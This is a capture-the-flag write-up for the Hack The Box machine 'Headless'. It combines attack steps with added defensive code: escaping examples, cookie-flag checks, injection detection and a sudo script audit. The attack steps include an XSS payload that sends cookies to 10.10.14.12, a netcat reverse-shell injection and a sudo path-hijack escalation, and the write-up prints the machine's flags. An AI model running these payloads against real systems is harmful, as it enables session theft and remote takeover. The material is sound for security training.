// htb writeup 2026-02-25
headless
HackTheBox Easy
root obtained // PWNED

Hack The Box - Headless (10.10.11.8)

🧠 Summary

Headless is an easy Linux machine hosted on Hack The Box. It demonstrates practical exploitation via:


🔍 Enumeration

🔹 Nmap

nmap -p- headless.htb --min-rate 5000
nmap -p 5000,22 -sC -sV headless.htb -oN nmap_alert

Findings:


🌐 Web Analysis


🚪 Gobuster Discovery

While testing XSS in the form, run Gobuster in the background to enumerate paths:

gobuster dir -u http://headless.htb:5000 -w /usr/share/wordlists/dirb/big.txt

Discovery:

/dashboard            (Status: 500)

🧪 Blind XSS via User-Agent

Step 1: Test XSS

User-Agent: <script>alert(1)</script>

Step 2: Trigger data exfil

<script>
var ink=new Image(); 
ink.src="http://10.10.14.12:4444/?cookie="+btoa(document.cookie);
</script>

Step 3: Listener

nc -lvnp 4444

Output:

GET /?cookie=aXNfYWRtaW49SW1Ga2JXbHVJZy5kbXpEa1pORW02Q0swb3lMMWZiTS1TblhwSDA=

Decode:

echo "aXNf..." | base64 -d
# is_admin=...
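The chain above works for two reasons: the dashboard stores the raw User-Agent header and later renders it to the admin without escaping, and the session cookie is readable from script, so document.cookie can be sent out. The block below is an added example, not code from the box or from this writeup: a stand-in store-and-render handler in its vulnerable and escaped forms, plus an audit of Set-Cookie flags. The stored entries and the cookie value are constructed placeholders.

```python
import html
import re

# Constructed sample of what a request-logging handler might persist: the raw
# User-Agent header of each hit. The second entry is the probe used in the
# writeup; the third mixes quotes, an ampersand and a tag.
STORED_REQUESTS = [
    {"ip": "10.10.14.12", "user_agent": "Mozilla/5.0 (X11; Linux x86_64)"},
    {"ip": "10.10.14.12", "user_agent": "<script>alert(1)</script>"},
    {"ip": "10.10.14.12", "user_agent": 'curl/8.0 "quoted" & <b>bold</b>'},
]


def render_dashboard_unsafe(requests):
    """Vulnerable pattern: header values are concatenated straight into HTML,
    so whatever a client put in User-Agent becomes markup in the admin's browser."""
    rows = "".join(
        f"<tr><td>{r['ip']}</td><td>{r['user_agent']}</td></tr>" for r in requests
    )
    return f"<table>{rows}</table>"


def render_dashboard_safe(requests):
    """Hardened pattern: every untrusted value is HTML-escaped before insertion.
    quote=True also escapes single and double quotes, so the value is safe
    inside attributes as well as between tags."""
    rows = "".join(
        f"<tr><td>{html.escape(r['ip'], quote=True)}</td>"
        f"<td>{html.escape(r['user_agent'], quote=True)}</td></tr>"
        for r in requests
    )
    return f"<table>{rows}</table>"


SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def contains_live_script_tag(document):
    """True if the rendered document still carries an unescaped <script ...> tag."""
    return SCRIPT_TAG.search(document) is not None


# Flags a session cookie should carry. HttpOnly is the one that stops
# document.cookie from reading it, which is what the exfil above relies on.
REQUIRED_FLAGS = ("HttpOnly", "Secure", "SameSite")


def missing_cookie_flags(set_cookie_header):
    """Return the REQUIRED_FLAGS absent from a Set-Cookie header value."""
    attrs = [p.strip().lower() for p in set_cookie_header.split(";")[1:]]
    missing = []
    for flag in REQUIRED_FLAGS:
        key = flag.lower()
        if not any(a == key or a.startswith(key + "=") for a in attrs):
            missing.append(flag)
    return missing


if __name__ == "__main__":
    print(render_dashboard_unsafe(STORED_REQUESTS))
    print(render_dashboard_safe(STORED_REQUESTS))
    # The cookie value is a constructed placeholder, not the one from the box.
    print(missing_cookie_flags("is_admin=PLACEHOLDER; Path=/"))
    print(missing_cookie_flags("is_admin=PLACEHOLDER; Path=/; HttpOnly; Secure; SameSite=Strict"))
```

Escaping at render time is the fix that matters here; filtering the header on the way in is not a substitute, because the same stored value may be rendered in more than one context later.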


💥 Command Injection → Reverse Shell

Payload:

date=2023-09-15;nc 10.10.14.12 1334 -e /bin/bash

Listener:

nc -lvnp 1334

Stabilize shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
# press Ctrl+Z to background the shell, then:
stty raw -echo; fg; reset
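The reverse shell lands because the date field reaches a shell unfiltered, so the text after the semicolon runs as a second command. The block below is an added Python example, not the box's code: the handling pattern in its vulnerable form (a command string built by concatenation) beside the hardened one (allow-list validation, then execution through an argument list with no shell). The program that gets run is a stand-in, the interpreter printing its first argument, so the block runs anywhere; the report script name is hypothetical and the injection-looking value is the payload quoted above.

```python
import re
import subprocess
import sys
from datetime import date

# Constructed parameter values: a benign date and the writeup's payload.
BENIGN = "2023-09-15"
PAYLOAD = "2023-09-15;nc 10.10.14.12 1334 -e /bin/bash"

DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}")
SHELL_META = re.compile(r"[;&|`$<>\n\\]")


def is_valid_date(value):
    """Allow-list check: exactly YYYY-MM-DD and a real calendar date."""
    if not DATE_RE.fullmatch(value):
        return False
    try:
        date.fromisoformat(value)
    except ValueError:
        return False
    return True


def looks_like_injection(value):
    """Detection heuristic for request logs or WAF rules: shell metacharacters
    in a field that should only ever hold a date."""
    return SHELL_META.search(value) is not None


def build_command_unsafe(value):
    """Vulnerable pattern: the value is spliced into a command string that is
    then handed to a shell (subprocess.run(cmd, shell=True) or os.system).
    Everything after ';' becomes a second command. Returned here, never run."""
    return f"/usr/local/bin/report.sh {value}"   # hypothetical script name


def run_report_argv(value):
    """Safer execution: an argv list with shell=False. The value is exactly one
    argument and is never parsed for ';', '|' or '$(...)'. A stand-in program
    (the Python interpreter printing its first argument) replaces the report
    script so the block runs offline."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", value],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout.rstrip("\n")


def handle_date_param(value):
    """Hardened handler: validate first, then run without a shell.
    Returns ("rejected", None) or ("ok", program_output)."""
    if not is_valid_date(value):
        return ("rejected", None)
    return ("ok", run_report_argv(value))


if __name__ == "__main__":
    print(build_command_unsafe(PAYLOAD))   # second command visibly appended
    print(run_report_argv(PAYLOAD))        # argv: printed back literally, nothing executed
    print(handle_date_param(BENIGN), handle_date_param(PAYLOAD))
```

Both halves of the fix are needed: the argv list removes the shell parse, and the validation keeps a malformed value from ever reaching the program, whatever that program does with its arguments.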

🏁 User Flag

cat /home/dvir/user.txt
98199ec69a2d999bffd3147052096f35

⬆️ Privilege Escalation

sudo -l output:

(ALL) NOPASSWD: /usr/bin/syscheck

Read syscheck script:

cat /usr/bin/syscheck

Exploit via the missing initdb.sh:

echo -e '#!/bin/bash\n/bin/bash' > /tmp/initdb.sh
chmod +x /tmp/initdb.sh
cd /tmp
sudo syscheck

Now root!

whoami
root
cat /root/root.txt
bd2d4eb12d06b81cc888cef32e370f68
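The escalation works because a script that sudo allows the user to run as root looks for initdb.sh relative to the caller's working directory, so placing a file there and running the script from /tmp is enough. The block below is an added example and not the box's syscheck, whose contents this writeup does not reproduce: a small audit that parses sudo -l output for NOPASSWD targets and scans a script's source for relative-path references. It is run over two constructed stand-in scripts, one with the weak pattern and one corrected to an absolute path; the sudo -l text, the script bodies and the /opt/maint path are assumptions.

```python
import re

# Constructed sudo -l output; the rule line matches the one in the writeup.
SUDO_L_OUTPUT = """Matching Defaults entries for dvir on headless:
    env_reset, mail_badpass

User dvir may run the following commands on headless:
    (ALL) NOPASSWD: /usr/bin/syscheck
"""

# Hypothetical stand-in for a privileged maintenance script (NOT the real
# syscheck): it refers to initdb.sh by a relative path, so whoever controls the
# working directory controls what root executes.
WEAK_SCRIPT = """#!/bin/bash
if [[ ! -x ./initdb.sh ]]; then
    echo "initdb.sh missing"
fi
./initdb.sh
/usr/bin/df -h
"""

# Same logic with an absolute path into a root-owned directory (assumed path).
FIXED_SCRIPT = """#!/bin/bash
INITDB=/opt/maint/initdb.sh
if [[ ! -x "$INITDB" ]]; then
    echo "initdb.sh missing"; exit 1
fi
"$INITDB"
/usr/bin/df -h
"""

SUDO_RULE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s+(?P<nopasswd>NOPASSWD:\s*)?(?P<cmds>.+)$"
)
# ./foo or ../foo not glued to a preceding word or slash
RELATIVE_PATH = re.compile(r"(?<![\w/])(\.{1,2}/[\w./-]+)")


def parse_sudo_l(text):
    """Return [(runas, nopasswd, command)] for each rule line of sudo -l output."""
    rules = []
    for line in text.splitlines():
        m = SUDO_RULE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            rules.append((m.group("runas"), m.group("nopasswd") is not None, cmd.strip()))
    return rules


def relative_references(script_text):
    """List (line_number, token) for every ./ or ../ reference outside comments.
    Comment stripping is naive (first '#'), which is enough for an audit pass."""
    hits = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        code = line.split("#", 1)[0]
        for token in RELATIVE_PATH.findall(code):
            hits.append((lineno, token))
    return hits


def audit(sudo_output, script_sources):
    """Cross the sudo rules with script sources (path -> text; supplied here as
    constructed strings instead of reading the real files). Returns one finding
    per relative-path reference inside a sudo-runnable script."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_l(sudo_output):
        source = script_sources.get(cmd.split()[0])
        if source is None:
            continue
        for lineno, token in relative_references(source):
            findings.append({"command": cmd, "runas": runas, "nopasswd": nopasswd,
                             "line": lineno, "relative_path": token})
    return findings


if __name__ == "__main__":
    for f in audit(SUDO_L_OUTPUT, {"/usr/bin/syscheck": WEAK_SCRIPT}):
        print(f)
    print(audit(SUDO_L_OUTPUT, {"/usr/bin/syscheck": FIXED_SCRIPT}))
```

The fixed script also exits when the helper is absent instead of silently continuing; a privileged script should fail closed rather than fall through to whatever is in the current directory.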

🧠 Lessons Learned


Writeup by inksec